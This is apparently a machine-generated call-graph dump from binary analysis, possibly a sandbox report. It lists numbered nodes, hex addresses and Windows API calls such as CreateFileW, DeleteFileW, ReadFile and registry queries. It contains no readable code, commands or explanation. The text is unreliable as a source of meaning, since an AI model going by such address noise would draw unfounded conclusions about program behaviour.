96521->96495 96523 1012ca7 DeleteFileW 96522->96523 96524 1012cb9 DeleteFileW 96522->96524 96523->96495 96858 1012fd8 CreateFileW 96524->96858 96526->96495 96526->96516 96526->96519 96836 fcdbb3 96526->96836 96865 10122ce 96528->96865 96531 1012c80 DeleteFileW 96531->96495 96533 fab578 96532->96533 96534 fab57f 96532->96534 96533->96534 97172 fc62d1 39 API calls 96533->97172 96534->95983 96536 fab5c2 96536->95983 96537->96019 96538->96031 96540 fa4ea8 GetProcAddress 96539->96540 96541 fa4ec6 96539->96541 96542 fa4eb8 96540->96542 96544 fce5eb 96541->96544 96542->96541 96543 fa4ebf FreeLibrary 96542->96543 96543->96541 96575 fce52a 96544->96575 96546 fa4eea 96546->96352 96546->96353 96548 fa4e6e GetProcAddress 96547->96548 96549 fa4e8d 96547->96549 96550 fa4e7e 96548->96550 96552 fa4f80 96549->96552 96550->96549 96551 fa4e86 FreeLibrary 96550->96551 96551->96549 96553 fbfe0b 22 API calls 96552->96553 96554 fa4f95 96553->96554 96555 fa5722 22 API calls 96554->96555 96556 fa4fa1 __fread_nolock 96555->96556 96557 fe3d1d 96556->96557 96558 fa50a5 96556->96558 96568 fa4fdc 96556->96568 96654 101304d 74 API calls 96557->96654 96643 fa42a2 CreateStreamOnHGlobal 96558->96643 96561 fe3d22 96563 fa511f 64 API calls 96561->96563 96562 fa50f5 40 API calls 96562->96568 96564 fe3d45 96563->96564 96565 fa50f5 40 API calls 96564->96565 96567 fa506e ISource 96565->96567 96567->96360 96568->96561 96568->96562 96568->96567 96649 fa511f 96568->96649 96570 fa5107 96569->96570 96571 fe3d70 96569->96571 96676 fce8c4 96570->96676 96574 10128fe 27 API calls 96574->96368 96578 fce536 BuildCatchObjectHelperInternal 96575->96578 96576 fce544 96600 fcf2d9 20 API calls _abort 96576->96600 96578->96576 96580 fce574 96578->96580 96579 fce549 96601 fd27ec 26 API calls __cftof 96579->96601 96582 fce579 96580->96582 96583 fce586 96580->96583 96602 fcf2d9 20 API calls _abort 96582->96602 96592 fd8061 96583->96592 96586 fce58f 96587 fce595 96586->96587 96588 fce5a2 96586->96588 96603 fcf2d9 20 API calls _abort 96587->96603 96604 fce5d4 LeaveCriticalSection __fread_nolock 96588->96604 96589 fce554 __wsopen_s 96589->96546 96593 fd806d BuildCatchObjectHelperInternal 96592->96593 96605 fd2f5e EnterCriticalSection 96593->96605 96595 fd807b 96606 fd80fb 96595->96606 96599 fd80ac __wsopen_s 96599->96586 96600->96579 96601->96589 96602->96589 96603->96589 96604->96589 96605->96595 96611 fd811e 96606->96611 96607 fd8177 96624 fd4c7d 96607->96624 96611->96607 96615 fd8088 96611->96615 96622 fc918d EnterCriticalSection 96611->96622 96623 fc91a1 LeaveCriticalSection 96611->96623 96613 fd8189 96613->96615 96637 fd3405 11 API calls 2 library calls 96613->96637 96619 fd80b7 96615->96619 96616 fd81a8 96638 fc918d EnterCriticalSection 96616->96638 96642 fd2fa6 LeaveCriticalSection 96619->96642 96621 fd80be 96621->96599 96622->96611 96623->96611 96630 fd4c8a _abort 96624->96630 96625 fd4cca 96640 fcf2d9 20 API calls _abort 96625->96640 96626 fd4cb5 RtlAllocateHeap 96627 fd4cc8 96626->96627 96626->96630 96631 fd29c8 96627->96631 96630->96625 96630->96626 96639 fc4ead 7 API calls 2 library calls 96630->96639 96632 fd29d3 RtlFreeHeap 96631->96632 96636 fd29fc __dosmaperr 96631->96636 96633 fd29e8 96632->96633 96632->96636 96641 fcf2d9 20 API calls _abort 96633->96641 96635 fd29ee GetLastError 96635->96636 96636->96613 96637->96616 96638->96615 96639->96630 96640->96627 96641->96635 96642->96621 96644 fa42bc FindResourceExW 96643->96644 96648 fa42d9 96643->96648 96645 fe35ba LoadResource 96644->96645 96644->96648 96646 fe35cf SizeofResource 96645->96646 96645->96648 96647 fe35e3 LockResource 96646->96647 96646->96648 96647->96648 96648->96568 96650 fa512e 96649->96650 96653 fe3d90 96649->96653 96655 fcece3 96650->96655 96654->96561 96658 fceaaa 96655->96658 96657 fa513c 96657->96568 96659 fceab6 BuildCatchObjectHelperInternal 96658->96659 96660 fceac2 96659->96660 96662 fceae8 96659->96662 96671 fcf2d9 20 API calls _abort 96660->96671 96673 fc918d EnterCriticalSection 96662->96673 96663 fceac7 96672 fd27ec 26 API calls __cftof 96663->96672 96666 fceaf4 96674 fcec0a 62 API calls 2 library calls 96666->96674 96668 fceb08 96675 fceb27 LeaveCriticalSection __fread_nolock 96668->96675 96670 fcead2 __wsopen_s 96670->96657 96671->96663 96672->96670 96673->96666 96674->96668 96675->96670 96679 fce8e1 96676->96679 96678 fa5118 96678->96574 96680 fce8ed BuildCatchObjectHelperInternal 96679->96680 96681 fce92d 96680->96681 96682 fce900 ___scrt_fastfail 96680->96682 96683 fce925 __wsopen_s 96680->96683 96692 fc918d EnterCriticalSection 96681->96692 96706 fcf2d9 20 API calls _abort 96682->96706 96683->96678 96686 fce937 96693 fce6f8 96686->96693 96687 fce91a 96707 fd27ec 26 API calls __cftof 96687->96707 96692->96686 96697 fce70a ___scrt_fastfail 96693->96697 96699 fce727 96693->96699 96694 fce717 96781 fcf2d9 20 API calls _abort 96694->96781 96696 fce71c 96782 fd27ec 26 API calls __cftof 96696->96782 96697->96694 96697->96699 96702 fce76a __fread_nolock 96697->96702 96708 fce96c LeaveCriticalSection __fread_nolock 96699->96708 96700 fce886 ___scrt_fastfail 96784 fcf2d9 20 API calls _abort 96700->96784 96702->96699 96702->96700 96709 fcd955 96702->96709 96716 fd8d45 96702->96716 96783 fccf78 26 API calls 4 library calls 96702->96783 96706->96687 96707->96683 96708->96683 96710 fcd976 96709->96710 96711 fcd961 96709->96711 96710->96702 96785 fcf2d9 20 API calls _abort 96711->96785 96713 fcd966 96786 fd27ec 26 API calls __cftof 96713->96786 96715 fcd971 96715->96702 96717 fd8d6f 96716->96717 96718 fd8d57 96716->96718 96720 fd90d9 96717->96720 96725 fd8db4 96717->96725 96796 fcf2c6 20 API calls _abort 96718->96796 96812 fcf2c6 20 API calls _abort 96720->96812 96721 fd8d5c 96797 fcf2d9 20 API calls _abort 96721->96797 96724 fd90de 96813 fcf2d9 20 API calls _abort 96724->96813 96726 fd8d64 96725->96726 96728 fd8dbf 96725->96728 96733 fd8def 96725->96733 96726->96702 96798 fcf2c6 20 API calls _abort 96728->96798 96729 fd8dcc 96814 fd27ec 26 API calls __cftof 96729->96814 96731 fd8dc4 96799 fcf2d9 20 API calls _abort 96731->96799 96735 fd8e08 96733->96735 96736 fd8e2e 96733->96736 96737 fd8e4a 96733->96737 96735->96736 96769 fd8e15 96735->96769 96800 fcf2c6 20 API calls _abort 96736->96800 96803 fd3820 21 API calls 2 library calls 96737->96803 96740 fd8e33 96801 fcf2d9 20 API calls _abort 96740->96801 96741 fd8e61 96744 fd29c8 _free 20 API calls 96741->96744 96749 fd8e6a 96744->96749 96745 fd8fb3 96747 fd9029 96745->96747 96750 fd8fcc GetConsoleMode 96745->96750 96746 fd8e3a 96802 fd27ec 26 API calls __cftof 96746->96802 96752 fd902d ReadFile 96747->96752 96751 fd29c8 _free 20 API calls 96749->96751 96750->96747 96753 fd8fdd 96750->96753 96754 fd8e71 96751->96754 96755 fd9047 96752->96755 96756 fd90a1 GetLastError 96752->96756 96753->96752 96758 fd8fe3 ReadConsoleW 96753->96758 96759 fd8e7b 96754->96759 96760 fd8e96 96754->96760 96755->96756 96757 fd901e 96755->96757 96761 fd90ae 96756->96761 96762 fd9005 96756->96762 96773 fd906c 96757->96773 96774 fd9083 96757->96774 96778 fd8e45 __fread_nolock 96757->96778 96758->96757 96765 fd8fff GetLastError 96758->96765 96804 fcf2d9 20 API calls _abort 96759->96804 96806 fd9424 28 API calls __fread_nolock 96760->96806 96810 fcf2d9 20 API calls _abort 96761->96810 96762->96778 96807 fcf2a3 20 API calls __dosmaperr 96762->96807 96765->96762 96766 fd29c8 _free 20 API calls 96766->96726 96768 fd90b3 96811 fcf2c6 20 API calls _abort 96768->96811 96787 fdf89b 96769->96787 96771 fd8e80 96805 fcf2c6 20 API calls _abort 96771->96805 96808 fd8a61 31 API calls 2 library calls 96773->96808 96777 fd909a 96774->96777 96774->96778 96809 fd88a1 29 API calls __fread_nolock 96777->96809 96778->96766 96780 fd909f 96780->96778 96781->96696 96782->96699 96783->96702 96784->96696 96785->96713 96786->96715 96788 fdf8a8 96787->96788 96790 fdf8b5 96787->96790 96815 fcf2d9 20 API calls _abort 96788->96815 96793 fdf8c1 96790->96793 96816 fcf2d9 20 API calls _abort 96790->96816 96792 fdf8ad 96792->96745 96793->96745 96794 fdf8e2 96817 fd27ec 26 API calls __cftof 96794->96817 96796->96721 96797->96726 96798->96731 96799->96729 96800->96740 96801->96746 96802->96778 96803->96741 96804->96771 96805->96778 96806->96769 96807->96778 96808->96778 96809->96780 96810->96768 96811->96778 96812->96724 96813->96729 96814->96726 96815->96792 96816->96794 96817->96792 96818->96408 96820 fa6382 96819->96820 96826 fa63b6 __fread_nolock 96819->96826 96821 fe4a82 96820->96821 96822 fa63a9 96820->96822 96820->96826 96823 fbfddb 22 API calls 96821->96823 96824 faa587 22 API calls 96822->96824 96825 fe4a91 96823->96825 96824->96826 96827 fbfe0b 22 API calls 96825->96827 96826->96419 96828 fe4ac5 __fread_nolock 96827->96828 96829->96420 96830->96461 96831->96463 96894 fce4e8 96832->96894 96834 101275d 96834->96484 96835->96514 96837 fcdbc1 96836->96837 96843 fcdbdd 96836->96843 96838 fcdbcd 96837->96838 96839 fcdbe3 96837->96839 96837->96843 96911 fcf2d9 20 API calls _abort 96838->96911 96908 fcd9cc 96839->96908 96842 fcdbd2 96912 fd27ec 26 API calls __cftof 96842->96912 96843->96526 96846 fce684 BuildCatchObjectHelperInternal 96845->96846 96847 fce6aa 96846->96847 96848 fce695 96846->96848 96849 fce6a5 __wsopen_s 96847->96849 97047 fc918d EnterCriticalSection 96847->97047 97064 fcf2d9 20 API calls _abort 96848->97064 96849->96518 96852 fce69a 97065 fd27ec 26 API calls __cftof 96852->97065 96854 fce6c6 97048 fce602 96854->97048 96856 fce6d1 97066 fce6ee LeaveCriticalSection __fread_nolock 96856->97066 96859 1013013 96858->96859 96860 1012fff SetFileTime CloseHandle 96858->96860 96859->96495 96860->96859 96861->96491 96862->96497 96863->96505 96864->96505 96866 10122d9 96865->96866 96868 10122e7 96865->96868 96867 fce5eb 29 API calls 96866->96867 96867->96868 96869 101232c 96868->96869 96870 fce5eb 29 API calls 96868->96870 96889 10122f0 96868->96889 97140 1012557 96869->97140 96872 1012311 96870->96872 96872->96869 96873 101231a 96872->96873 96877 fce678 67 API calls 96873->96877 96873->96889 96874 1012370 96875 1012395 96874->96875 96876 1012374 96874->96876 97144 1012171 96875->97144 96879 1012381 96876->96879 96881 fce678 67 API calls 96876->96881 96877->96889 96879->96889 96881->96879 96889->96524 96889->96531 96897 fce469 96894->96897 96896 fce505 96896->96834 96898 fce48c 96897->96898 96899 fce478 96897->96899 96903 fce488 __alldvrm 96898->96903 96907 fd333f 11 API calls 2 library calls 96898->96907 96905 fcf2d9 20 API calls _abort 96899->96905 96902 fce47d 96906 fd27ec 26 API calls __cftof 96902->96906 96903->96896 96905->96902 96906->96903 96907->96903 96913 fcd97b 96908->96913 96911->96842 96912->96843 96914 fcd987 BuildCatchObjectHelperInternal 96913->96914 96921 fc918d EnterCriticalSection 96914->96921 96916 fcd995 96922 fcd9f4 96916->96922 96921->96916 96930 fd49a1 96922->96930 96931 fcd955 __fread_nolock 26 API calls 96930->96931 96932 fd49b0 96931->96932 96933 fdf89b __fread_nolock 26 API calls 96932->96933 96934 fd49b6 96933->96934 96938 fcda09 96934->96938 96951 fd3820 21 API calls 2 library calls 96934->96951 96936 fd4a15 96939 fcda3a 96938->96939 96951->96936 97047->96854 97049 fce60f 97048->97049 97050 fce624 97048->97050 97086 fcf2d9 20 API calls _abort 97049->97086 97053 fcdc0b 62 API calls 97050->97053 97056 fce61f 97050->97056 97052 fce614 97087 fd27ec 26 API calls __cftof 97052->97087 97055 fce638 97053->97055 97067 fd4d7a 97055->97067 97056->96856 97059 fcd955 __fread_nolock 26 API calls 97060 fce646 97059->97060 97071 fd862f 97060->97071 97064->96852 97065->96849 97066->96849 97068 fce640 97067->97068 97069 fd4d90 97067->97069 97068->97059 97069->97068 97070 fd29c8 _free 20 API calls 97069->97070 97070->97068 97072 fd863e 97071->97072 97073 fd8653 97071->97073 97091 fcf2c6 20 API calls _abort 97072->97091 97075 fd868e 97073->97075 97079 fd867a 97073->97079 97086->97052 97087->97056 97141 101257c 97140->97141 97143 1012565 __fread_nolock 97140->97143 97142 fce8c4 __fread_nolock 40 API calls 97141->97142 97142->97143 97143->96874 97172->96536 97174 fa9c7e 97173->97174 97175 fef545 97173->97175 97180 fbfddb 22 API calls 97174->97180 97176 fef556 97175->97176 97177 fa6b57 22 API calls 97175->97177 97178 faa6c3 22 API calls 97176->97178 97177->97176 97179 fef560 97178->97179 97179->97179 97181 fa9c91 97180->97181 97182 fa9c9a 97181->97182 97183 fa9cac 97181->97183 97185 fa9cb3 22 API calls 97182->97185 97184 faa961 22 API calls 97183->97184 97186 fa9ca2 97184->97186 97185->97186 97186->96068 97186->96071 97246 fa54c6 97187->97246 97190 fa54c6 3 API calls 97191 fbfa9a 97190->97191 97191->96086 97193 fbfe0b 22 API calls 97192->97193 97194 fa6295 97193->97194 97195 fbfddb 22 API calls 97194->97195 97196 fa62a3 97195->97196 97197 fbf141 97196->97197 97198 fbf188 97197->97198 97199 fbf14c 97197->97199 97200 faa6c3 22 API calls 97198->97200 97199->97198 97201 fbf15b 97199->97201 97202 100caeb 97200->97202 97203 fbf170 97201->97203 97204 fbf17d 97201->97204 97210 100cb1a 97202->97210 97260 100ca89 ReadFile SetFilePointerEx 97202->97260 97261 fa49bd 22 API calls __fread_nolock 97202->97261 97252 fbf18e 97203->97252 97259 100cbf2 26 API calls 97204->97259 97208 fbf179 97208->96102 97210->96102 97212 fa625f 97211->97212 97213 fa6250 97211->97213 97212->97213 97214 fa6264 CloseHandle 97212->97214 97213->96076 97214->97213 97216 fa575c CreateFileW 97215->97216 97217 fe4035 97215->97217 97218 fa577b 97216->97218 97217->97218 97219 fe403b CreateFileW 97217->97219 97218->96099 97218->96100 97219->97218 97220 fe4063 97219->97220 97221 fa54c6 3 API calls 97220->97221 97222 fe406e 97221->97222 97222->97218 97224 fa53f3 97223->97224 97237 fa53f0 ISource 97223->97237 97225 fa54c6 3 API calls 97224->97225 97224->97237 97226 fa5410 97225->97226 97227 fe3f4b 97226->97227 97228 fa541d 97226->97228 97229 fbfa5b 3 API calls 97227->97229 97230 fbfe0b 22 API calls 97228->97230 97229->97237 97231 fa5429 97230->97231 97232 fa5722 22 API calls 97231->97232 97233 fa5433 97232->97233 97234 fa9a40 2 API calls 97233->97234 97235 fa543f 97234->97235 97236 fa54c6 3 API calls 97235->97236 97236->97237 97237->96108 97238->96114 97239->96112 97240->96115 97241->96119 97242->96071 97243->96071 97244->96098 97245->96110 97251 fa54dd 97246->97251 97247 fe3f9c SetFilePointerEx 97248 fa5564 SetFilePointerEx SetFilePointerEx 97249 fa5530 97248->97249 97249->97190 97250 fe3f8b 97250->97247 97251->97247 97251->97248 97251->97249 97251->97250 97262 fbf1d8 97252->97262 97258 fbf1c1 97258->97208 97259->97208 97260->97202 97261->97202 97263 fbfe0b 22 API calls 97262->97263 97264 fbf1ef 97263->97264 97265 fbfddb 22 API calls 97264->97265 97266 fbf1a6 97265->97266 97267 fa97b6 97266->97267 97274 fa9a1e 97267->97274 97269 fa97fc 97269->97258 97273 fa6e14 24 API calls 97269->97273 97271 fa97c7 97271->97269 97281 fa9a40 97271->97281 97287 fa9b01 22 API calls __fread_nolock 97271->97287 97273->97258 97275 fa9a2f 97274->97275 97276 fef378 97274->97276 97275->97271 97277 fbfddb 22 API calls 97276->97277 97278 fef382 97277->97278 97279 fbfe0b 22 API calls 97278->97279 97280 fef397 97279->97280 97282 fa9abb 97281->97282 97285 fa9a4e 97281->97285 97288 fbe40f SetFilePointerEx 97282->97288 97284 fa9a7c 97284->97271 97285->97284 97286 fa9a8c ReadFile 97285->97286 97286->97284 97286->97285 97287->97271 97288->97285 97289->96163 97290->96170 97291->96168 97292->96177 97293->96177 97295 fa6270 22 API calls 97294->97295 97321 fa9eb5 97295->97321 97296 fa9fd2 97323 faa4a1 22 API calls __fread_nolock 97296->97323 97299 fa9fec 97299->96182 97301 fef7c4 97328 10096e2 84 API calls __wsopen_s 97301->97328 97302 fef699 97309 fbfddb 22 API calls 97302->97309 97304 faa405 97304->97299 97330 10096e2 84 API calls __wsopen_s 97304->97330 97306 faa4a1 22 API calls 97306->97321 97308 faa6c3 22 API calls 97308->97321 97311 fef754 97309->97311 97310 fef7d2 97329 faa4a1 22 API calls __fread_nolock 97310->97329 97314 fbfe0b 22 API calls 97311->97314 97313 fef7e8 97313->97299 97316 faa12c __fread_nolock 97314->97316 97316->97301 97316->97304 97317 faa587 22 API calls 97317->97321 97318 faaec9 22 API calls 97319 faa0db CharUpperBuffW 97318->97319 97324 faa673 22 API calls 97319->97324 97321->97296 97321->97301 97321->97302 97321->97304 97321->97306 97321->97308 97321->97316 97321->97317 97321->97318 97322 fa4573 41 API calls _wcslen 97321->97322 97325 fa48c8 23 API calls 97321->97325 97326 fa49bd 22 API calls __fread_nolock 97321->97326 97327 faa673 22 API calls 97321->97327 97322->97321 97323->97299 97324->97321 97325->97321 97326->97321 97327->97321 97328->97310 97329->97313 97330->97299 97332 100d4d5 97331->97332 97333 100dbdc GetFileAttributesW 97331->97333 97332->95911 97333->97332 97334 100dbe8 FindFirstFileW 97333->97334 97334->97332 97335 100dbf9 FindClose 97334->97335 97335->97332 97336 fadddc 97339 fab710 97336->97339 97340 fab72b 97339->97340 97341 ff00f8 97340->97341 97342 ff0146 97340->97342 97369 fab750 97340->97369 97345 ff0102 97341->97345 97346 ff010f 97341->97346 97341->97369 97381 10258a2 256 API calls 2 library calls 97342->97381 97379 1025d33 256 API calls 97345->97379 97365 faba20 97346->97365 97380 10261d0 256 API calls 2 library calls 97346->97380 97351 ff03d9 97351->97351 97353 fabbe0 40 API calls 97353->97369 97355 fbd336 40 API calls 97355->97369 97357 faba4e 97358 ff0322 97384 1025c0c 82 API calls 97358->97384 97365->97357 97385 101359c 82 API calls __wsopen_s 97365->97385 97366 faec40 256 API calls 97366->97369 97367 faa8c7 22 API calls 97367->97369 97369->97353 97369->97355 97369->97357 97369->97358 97369->97365 97369->97366 97369->97367 97370 faa81b 41 API calls 97369->97370 97371 fbd2f0 40 API calls 97369->97371 97372 fba01b 256 API calls 97369->97372 97373 fc0242 5 API calls __Init_thread_wait 97369->97373 97374 fbedcd 22 API calls 97369->97374 97375 fc00a3 29 API calls __onexit 97369->97375 97376 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97369->97376 97377 fbee53 82 API calls 97369->97377 97378 fbe5ca 256 API calls 97369->97378 97382 faaceb 23 API calls ISource 97369->97382 97383 fff6bf 23 API calls 97369->97383 97370->97369 97371->97369 97372->97369 97373->97369 97374->97369 97375->97369 97376->97369 97377->97369 97378->97369 97379->97346 97380->97365 97381->97369 97382->97369 97383->97369 97384->97365 97385->97351 97386 fb0b9d 97387 fb0ba6 __fread_nolock 97386->97387 97388 fa7510 53 API calls 97387->97388 97389 ff5cb8 97387->97389 97392 fb0bf7 97387->97392 97393 fbfddb 22 API calls 97387->97393 97396 fb0847 __fread_nolock 97387->97396 97397 fbfe0b 22 API calls 97387->97397 97388->97387 97398 fa4a88 22 API calls __fread_nolock 97389->97398 97391 ff5cc4 97395 faa8c7 22 API calls 97391->97395 97391->97396 97394 faa587 22 API calls 97392->97394 97393->97387 97394->97396 97395->97396 97397->97387 97398->97391 97399 fd90fa 97400 fd9107 97399->97400 97404 fd911f 97399->97404 97449 fcf2d9 20 API calls _abort 97400->97449 97402 fd910c 97450 fd27ec 26 API calls __cftof 97402->97450 97405 fd917a 97404->97405 97413 fd9117 97404->97413 97451 fdfdc4 21 API calls 2 library calls 97404->97451 97407 fcd955 __fread_nolock 26 API calls 97405->97407 97408 fd9192 97407->97408 97419 fd8c32 97408->97419 97410 fd9199 97411 fcd955 __fread_nolock 26 API calls 97410->97411 97410->97413 97412 fd91c5 97411->97412 97412->97413 97414 fcd955 __fread_nolock 26 API calls 97412->97414 97415 fd91d3 97414->97415 97415->97413 97416 fcd955 __fread_nolock 26 API calls 97415->97416 97417 fd91e3 97416->97417 97418 fcd955 __fread_nolock 26 API calls 97417->97418 97418->97413 97420 fd8c3e BuildCatchObjectHelperInternal 97419->97420 97421 fd8c46 97420->97421 97426 fd8c5e 97420->97426 97453 fcf2c6 20 API calls _abort 97421->97453 97423 fd8d24 97460 fcf2c6 20 API calls _abort 97423->97460 97425 fd8c4b 97454 fcf2d9 20 API calls _abort 97425->97454 97426->97423 97427 fd8c97 97426->97427 97430 fd8cbb 97427->97430 97431 fd8ca6 97427->97431 97428 fd8d29 97461 fcf2d9 20 API calls _abort 97428->97461 97452 fd5147 EnterCriticalSection 97430->97452 97455 fcf2c6 20 API calls _abort 97431->97455 97435 fd8cb3 97462 fd27ec 26 API calls __cftof 97435->97462 97436 fd8cab 97456 fcf2d9 20 API calls _abort 97436->97456 97437 fd8cc1 97439 fd8cdd 97437->97439 97440 fd8cf2 97437->97440 97457 fcf2d9 20 API calls _abort 97439->97457 97444 fd8d45 __fread_nolock 38 API calls 97440->97444 97442 fd8c53 __wsopen_s 97442->97410 97445 fd8ced 97444->97445 97459 fd8d1c LeaveCriticalSection __wsopen_s 97445->97459 97446 fd8ce2 97458 fcf2c6 20 API calls _abort 97446->97458 97449->97402 97450->97413 97451->97405 97452->97437 97453->97425 97454->97442 97455->97436 97456->97435 97457->97446 97458->97445 97459->97442 97460->97428 97461->97435 97462->97442 97463 fc03fb 97464 fc0407 BuildCatchObjectHelperInternal 97463->97464 97492 fbfeb1 97464->97492 97466 fc040e 97467 fc0561 97466->97467 97470 fc0438 97466->97470 97519 fc083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97467->97519 97469 fc0568 97520 fc4e52 28 API calls _abort 97469->97520 97481 fc0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97470->97481 97503 fd247d 97470->97503 97472 fc056e 97521 fc4e04 28 API calls _abort 97472->97521 97476 fc0576 97477 fc0457 97479 fc04d8 97511 fc0959 97479->97511 97481->97479 97515 fc4e1a 38 API calls 2 library calls 97481->97515 97483 fc04de 97484 fc04f3 97483->97484 97516 fc0992 GetModuleHandleW 97484->97516 97486 fc04fa 97486->97469 97487 fc04fe 97486->97487 97488 fc0507 97487->97488 97517 fc4df5 28 API calls _abort 97487->97517 97518 fc0040 13 API calls 2 library calls 97488->97518 97491 fc050f 97491->97477 97493 fbfeba 97492->97493 97522 fc0698 IsProcessorFeaturePresent 97493->97522 97495 fbfec6 97523 fc2c94 10 API calls 3 library calls 97495->97523 97497 fbfecb 97498 fbfecf 97497->97498 97524 fd2317 97497->97524 97498->97466 97501 fbfee6 97501->97466 97504 fd2494 97503->97504 97505 fc0a8c _ValidateLocalCookies 5 API calls 97504->97505 97506 fc0451 97505->97506 97506->97477 97507 fd2421 97506->97507 97508 fd2450 97507->97508 97509 fc0a8c _ValidateLocalCookies 5 API calls 97508->97509 97510 fd2479 97509->97510 97510->97481 97583 fc2340 97511->97583 97514 fc097f 97514->97483 97515->97479 97516->97486 97517->97488 97518->97491 97519->97469 97520->97472 97521->97476 97522->97495 97523->97497 97528 fdd1f6 97524->97528 97527 fc2cbd 8 API calls 3 library calls 97527->97498 97531 fdd213 97528->97531 97532 fdd20f 97528->97532 97530 fbfed8 97530->97501 97530->97527 97531->97532 97534 fd4bfb 97531->97534 97546 fc0a8c 97532->97546 97535 fd4c07 BuildCatchObjectHelperInternal 97534->97535 97553 fd2f5e EnterCriticalSection 97535->97553 97537 fd4c0e 97554 fd50af 97537->97554 97539 fd4c1d 97545 fd4c2c 97539->97545 97567 fd4a8f 29 API calls 97539->97567 97542 fd4c27 97568 fd4b45 GetStdHandle GetFileType 97542->97568 97543 fd4c3d __wsopen_s 97543->97531 97569 fd4c48 LeaveCriticalSection _abort 97545->97569 97547 fc0a95 97546->97547 97548 fc0a97 IsProcessorFeaturePresent 97546->97548 97547->97530 97550 fc0c5d 97548->97550 97582 fc0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97550->97582 97552 fc0d40 97552->97530 97553->97537 97555 fd50bb BuildCatchObjectHelperInternal 97554->97555 97556 fd50df 97555->97556 97557 fd50c8 97555->97557 97570 fd2f5e EnterCriticalSection 97556->97570 97578 fcf2d9 20 API calls _abort 97557->97578 97560 fd50cd 97579 fd27ec 26 API calls __cftof 97560->97579 97562 fd5117 97580 fd513e LeaveCriticalSection _abort 97562->97580 97563 fd50d7 __wsopen_s 97563->97539 97564 fd50eb 97564->97562 97571 fd5000 97564->97571 97567->97542 97568->97545 97569->97543 97570->97564 97572 fd4c7d _abort 20 API calls 97571->97572 97573 fd5012 97572->97573 97577 fd501f 97573->97577 97581 fd3405 11 API calls 2 library calls 97573->97581 97574 fd29c8 _free 20 API calls 97576 fd5071 97574->97576 97576->97564 97577->97574 97578->97560 97579->97563 97580->97563 97581->97573 97582->97552 97584 fc096c GetStartupInfoW 97583->97584 97584->97514 97585 fa1033 97590 fa4c91 97585->97590 97589 fa1042 97591 faa961 22 API calls 97590->97591 97592 fa4cff 97591->97592 97598 fa3af0 97592->97598 97594 fa4d9c 97595 fa1038 97594->97595 97601 fa51f7 22 API calls __fread_nolock 97594->97601 97597 fc00a3 29 API calls __onexit 97595->97597 97597->97589 97602 fa3b1c 97598->97602 97601->97594 97603 fa3b0f 97602->97603 97604 fa3b29 97602->97604 97603->97594 97604->97603 97605 fa3b30 RegOpenKeyExW 97604->97605 97605->97603 97606 fa3b4a RegQueryValueExW 97605->97606 97607 fa3b80 RegCloseKey 97606->97607 97608 fa3b6b 97606->97608 97607->97603 97608->97607 97609 ff3f75 97620 fbceb1 97609->97620 97611 ff3f8b 97612 ff4006 97611->97612 97687 fbe300 23 API calls 97611->97687 97629 fabf40 97612->97629 97615 ff4052 97619 ff4a88 97615->97619 97689 101359c 82 API calls __wsopen_s 97615->97689 97617 ff3fe6 97617->97615 97688 1011abf 22 API calls 97617->97688 97621 fbcebf 97620->97621 97622 fbced2 97620->97622 97690 faaceb 23 API calls ISource 97621->97690 97623 fbced7 97622->97623 97624 fbcf05 97622->97624 97626 fbfddb 22 API calls 97623->97626 97691 faaceb 23 API calls ISource 97624->97691 97628 fbcec9 97626->97628 97628->97611 97692 faadf0 97629->97692 97631 fabf9d 97632 fabfa9 97631->97632 97633 ff04b6 97631->97633 97635 ff04c6 97632->97635 97636 fac01e 97632->97636 97711 101359c 82 API calls __wsopen_s 97633->97711 97712 101359c 82 API calls __wsopen_s 97635->97712 97697 faac91 97636->97697 97639 ff04f5 97641 ff055a 97639->97641 97713 fbd217 256 API calls 97639->97713 97640 fac7da 97646 fbfe0b 22 API calls 97640->97646 97674 fac603 97641->97674 97714 101359c 82 API calls __wsopen_s 97641->97714 97643 fac039 ISource __fread_nolock 97643->97639 97643->97640 97643->97641 97650 faec40 256 API calls 97643->97650 97651 1007120 22 API calls 97643->97651 97652 ff091a 97643->97652 97654 faaf8a 22 API calls 97643->97654 97655 fac808 __fread_nolock 97643->97655 97658 ff08a5 97643->97658 97662 ff0591 97643->97662 97663 ff08f6 97643->97663 97669 fbfddb 22 API calls 97643->97669 97670 fac237 97643->97670 97672 fbfe0b 22 API calls 97643->97672 97643->97674 97680 ff09bf 97643->97680 97683 fabbe0 40 API calls 97643->97683 97701 faad81 97643->97701 97716 1007099 22 API calls __fread_nolock 97643->97716 97717 1025745 54 API calls _wcslen 97643->97717 97718 fbaa42 22 API calls ISource 97643->97718 97719 100f05c 40 API calls 97643->97719 97720 faa993 41 API calls 97643->97720 97721 faaceb 23 API calls ISource 97643->97721 97646->97655 97650->97643 97651->97643 97724 1013209 23 API calls 97652->97724 97653 fbfe0b 22 API calls 97685 fac350 ISource __fread_nolock 97653->97685 97654->97643 97655->97653 97659 faec40 256 API calls 97658->97659 97661 ff08cf 97659->97661 97661->97674 97722 faa81b 41 API calls 97661->97722 97715 101359c 82 API calls __wsopen_s 97662->97715 97723 101359c 82 API calls __wsopen_s 97663->97723 97669->97643 97671 fac253 97670->97671 97673 faa8c7 22 API calls 97670->97673 97675 ff0976 97671->97675 97678 fac297 ISource 97671->97678 97672->97643 97673->97671 97674->97615 97725 faaceb 23 API calls ISource 97675->97725 97678->97680 97708 faaceb 23 API calls ISource 97678->97708 97680->97674 97726 101359c 82 API calls __wsopen_s 97680->97726 97681 fac335 97681->97680 97682 fac342 97681->97682 97709 faa704 22 API calls ISource 97682->97709 97683->97643 97686 fac3ac 97685->97686 97710 fbce17 22 API calls ISource 97685->97710 97686->97615 97687->97617 97688->97612 97689->97619 97690->97628 97691->97628 97693 faae01 97692->97693 97696 faae1c ISource 97692->97696 97694 faaec9 22 API calls 97693->97694 97695 faae09 CharUpperBuffW 97694->97695 97695->97696 97696->97631 97698 faacae 97697->97698 97699 faacd1 97698->97699 97727 101359c 82 API calls __wsopen_s 97698->97727 97699->97643 97702 fefadb 97701->97702 97703 faad92 97701->97703 97704 fbfddb 22 API calls 97703->97704 97705 faad99 97704->97705 97728 faadcd 97705->97728 97708->97681 97709->97685 97710->97685 97711->97635 97712->97674 97713->97641 97714->97674 97715->97674 97716->97643 97717->97643 97718->97643 97719->97643 97720->97643 97721->97643 97722->97663 97723->97674 